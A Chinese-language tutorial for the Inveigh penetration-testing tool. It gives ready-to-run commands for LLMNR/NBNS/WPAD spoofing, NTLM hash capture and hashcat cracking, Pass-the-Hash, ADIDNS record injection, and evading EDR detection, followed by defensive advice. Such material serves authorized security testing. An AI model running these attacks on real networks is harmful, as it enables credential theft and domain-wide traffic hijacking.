Inveigh终极中间人攻击测试工具从入门到实战【免费下载链接】Inveigh.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers项目地址: https://gitcode.com/gh_mirrors/in/Inveigh法律合规声明⚠️重要法律提示本工具仅用于授权环境下的安全测试。未经授权使用可能违反《中华人民共和国网络安全法》及相关法律法规使用者需自行承担法律责任。建议在独立隔离的测试环境中操作并获得书面授权。一、功能解析Inveigh核心能力与技术原理Inveigh是一款由Kevin Robertson开发的跨平台.NET工具专为渗透测试设计专注于IPv4/IPv6环境下的中间人MitM攻击。作为安全从业者必备的渗透测试工具它能够通过欺骗协议响应和捕获认证凭证帮助安全人员评估网络防御体系的有效性。1.1 核心功能模块功能类别关键组件作用说明协议欺骗LLMNR/NBNS/mDNS/DNS Spoofer响应局域网内名称解析请求将目标流量重定向至攻击机凭证捕获SMB/HTTP/HTTPS/Proxy Listener模拟服务端捕获NTLMv1/NTLMv2挑战响应、Basic认证明文及Kerberos TGT票据主动攻击NBNS Brute Force Spoofer主动探测网络内主机强制触发名称解析请求流量分析Packet Sniffer捕获并解析TCP/UDP流量支持PCAP文件导出AD集成ADIDNS Spoofer利用Active Directory DNS漏洞注入恶意记录实现持久化欺骗1.2 中间人攻击技术原理Inveigh的核心攻击流程基于名称解析欺骗与认证拦截欺骗阶段通过响应LLMNR5355/UDP、NBNS137/UDP、mDNS5353/UDP等协议的名称解析请求将目标主机的流量重定向至攻击机。拦截阶段在攻击机上启动SMB445/TCP、HTTP80/TCP等服务诱导目标发送认证请求。捕获阶段提取NTLM挑战响应哈希支持NTLMv1/NTLMv2或Kerberos票据可用于离线破解或票据传递攻击。二、环境准备快速部署与依赖配置2.1 系统要求操作系统Windows PowerShell 5.1 或 PowerShell Core 7.0权限要求管理员权限需创建HTTPS证书、修改系统网络配置依赖框架.NET Framework 4.5 或 .NET Core 3.12.2 安装步骤# 1. 克隆仓库 git clone https://gitcode.com/gh_mirrors/in/Inveigh cd Inveigh # 2. 加载模块 Import-Module .\Inveigh.psd1 # 3. 验证安装 Invoke-Inveigh -ShowHelp2.3 常见环境问题解决错误场景解决方案端口占用如53/80/445停止占用服务net stop dnscache或修改监听端口-HTTPPort 8080PowerShell执行权限不足执行Set-ExecutionPolicy Bypass -Scope ProcessHTTPS证书创建失败使用-HTTPSForceCertDelete Y强制删除冲突证书三、实战操作从基础配置到高级攻击3.1 参数配置指南Inveigh通过命令行参数控制行为核心参数速查表参数类别常用参数组合功能描述基础模式-LLMNR Y -NBNS Y -HTTP Y -SMB Y启用LLMNR/NBNS欺骗及HTTP/SMB捕获输出控制-ConsoleOutput Y -FileOutput Y -FileOutputDirectory C:\Logs启用控制台输出并保存日志到指定目录目标过滤-SpooferIPsReply 192.168.1.0/24 -SpooferHostsReply wpad,dc01仅响应特定IP范围或主机名的请求高级欺骗-ADIDNS Combo -ADIDNSDomainController dc01.corp.com启用ADIDNS组合攻击针对域控制器注入DNS记录3.2 预设攻击模板模板1基础凭证捕获适用于大多数内网环境Invoke-Inveigh -IP 192.168.1.100 -LLMNR Y -NBNS Y -HTTP Y -SMB Y -ConsoleOutput Y -FileOutput Y -FileOutputDirectory C:\InveighLogs风险等级中说明同时启用LLMNR/NBNS欺骗和HTTP/SMB捕获适合快速收集内网主机凭证。模板2AD环境下的DNS欺骗攻击Invoke-Inveigh -IP 192.168.1.100 -ADIDNS Combo -ADIDNSDomainController dc01.corp.com -ADIDNSDomain corp.com -ADIDNSZone corp.com -SpooferIP 192.168.1.100风险等级高说明利用ADIDNS漏洞注入恶意记录影响整个域环境的名称解析。模板3隐蔽模式降低检测概率Invoke-Inveigh -IP 192.168.1.100 -SpooferRepeat N -WPADAuth Anonymous -SpooferHostsReply wpad -ConsoleOutput Low风险等级低说明仅响应WPAD请求减少输出信息适合长期隐蔽监控。3.3 典型攻击场景演示场景1内网横向移动中的凭证捕获目标获取网段内主机的NTLM哈希用于Pass-the-Hash攻击。步骤在攻击机执行基础模板命令等待目标主机发起名称解析请求如访问不存在的UNC路径。捕获到NTLMv2哈希后使用Hashcat破解hashcat -m 5600 hash.txt rockyou.txt使用获取的凭证通过SMB登录目标主机Invoke-Command -ComputerName target -Credential (Get-Credential)场景2利用WPAD自动代理实现全流量劫持目标诱导浏览器通过攻击机代理捕获明文凭证。步骤执行命令启用WPAD响应Invoke-Inveigh -IP 192.168.1.100 -Proxy Y -WPADIP 192.168.1.100 -WPADPort 8080目标主机通过DHCP获取WPAD配置后浏览器流量将经过攻击机。攻击机通过-ProxyAuth NTLM捕获域用户凭证。场景3ADIDNS攻击持久化控制域内DNS目标注入恶意DNS记录长期控制域内名称解析。步骤利用域管理员权限执行ADIDNS注入Invoke-Inveigh -ADIDNS Wildcard -ADIDNSDomainController dc01.corp.com所有未解析的域名请求将指向攻击机可用于定向钓鱼或持续监听。四、进阶技巧防御绕过与工具对比4.1 防御绕过技巧技巧1规避ResponderGuard检测部分EDR工具通过检测单播LLMNR/NBNS请求识别欺骗攻击可通过以下参数绕过Invoke-Inveigh -EvadeRG Y # 忽略直接发送给攻击机IP的请求技巧2动态调整欺骗阈值通过-SpooferThresholdHost和-SpooferThresholdNetwork参数仅在多次请求后响应降低检测概率Invoke-Inveigh -SpooferThresholdHost 3 -SpooferThresholdNetwork 2技巧3清理ADIDNS记录使用-ADIDNSCleanup Y确保测试结束后自动移除注入的DNS记录避免留下痕迹。4.2 同类工具对比特性InveighResponderEttercap开发语言C#/PowerShellPythonC协议支持LLMNR/NBNS/mDNS/DNS/ADIDNSLLMNR/NBNS/mDNS/DNSARP欺骗/ICMP重定向凭证类型NTLMv1/NTLMv2/Kerberos/BasicNTLMv1/NTLMv2/Basic用户名/密码依赖插件跨平台Windows为主Linux/WindowsLinux为主AD集成支持ADIDNS注入无无结论Inveigh在Windows域环境中表现更优尤其适合ADIDNS攻击和Kerberos票据捕获Responder跨平台性更好Ettercap更适合底层流量篡改。4.3 .NET版本兼容性处理问题在.NET Core环境下可能出现Socket权限错误。解决强制使用.NET Framework运行powershell -Version 5.1 -Command Import-Module .\Inveigh.psd1; Invoke-Inveigh五、安全防护检测与防御措施5.1 检测方法网络流量监控通过Wireshark过滤udp.port in {137, 5353, 5355}检测异常的名称解析响应。日志分析检查域控制器DNS日志事件ID 5100中的异常记录。EDR告警启用终端防护软件对LLMNR/NBNS欺骗行为的检测规则。5.2 防御建议禁用不必要协议组策略禁用LLMNR和NBT-NS计算机配置 管理模板 网络 DNS客户端 关闭多播名称解析启用SMB签名强制所有SMB通信使用签名防止中继攻击。WPAD安全配置删除DHCP中的WPAD选项禁止自动检测代理。网络隔离通过VLAN和ACL限制广播域范围减少欺骗影响。六、总结Inveigh作为一款专注于中间人攻击的渗透测试工具凭借对Windows域环境的深度支持和丰富的协议欺骗能力成为内网渗透的关键武器。安全从业者需在授权环境下合理使用同时企业应通过技术防御与安全意识培训构建多层次防护体系抵御此类攻击。掌握Inveigh的使用不仅能提升渗透测试效率更能帮助安全团队理解中间人攻击的原理与防御要点为网络安全加固提供实践依据。【免费下载链接】Inveigh.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers项目地址: https://gitcode.com/gh_mirrors/in/Inveigh创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考